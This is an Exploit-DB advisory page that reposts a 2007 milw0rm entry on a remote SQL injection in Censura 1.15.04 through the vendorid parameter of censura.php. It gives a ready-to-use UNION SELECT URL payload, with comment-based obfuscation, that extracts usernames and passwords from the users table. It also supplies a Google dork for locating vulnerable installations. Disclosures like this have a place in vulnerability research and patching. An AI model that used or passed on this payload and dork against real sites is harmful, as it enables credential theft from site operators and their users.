Censura 1.15.04 - 'censura.php?vendorid' SQL Injection

EDB-ID:

3843




Platform:

PHP

Date:

2007-05-03


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

==============================================

Censura v1.15.04 (vendorid)  Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/

==============================================

google dork: "Powered by: Censura"

vendor: http://www.censura.info/  

==============================================

# milw0rm.com [2007-05-03]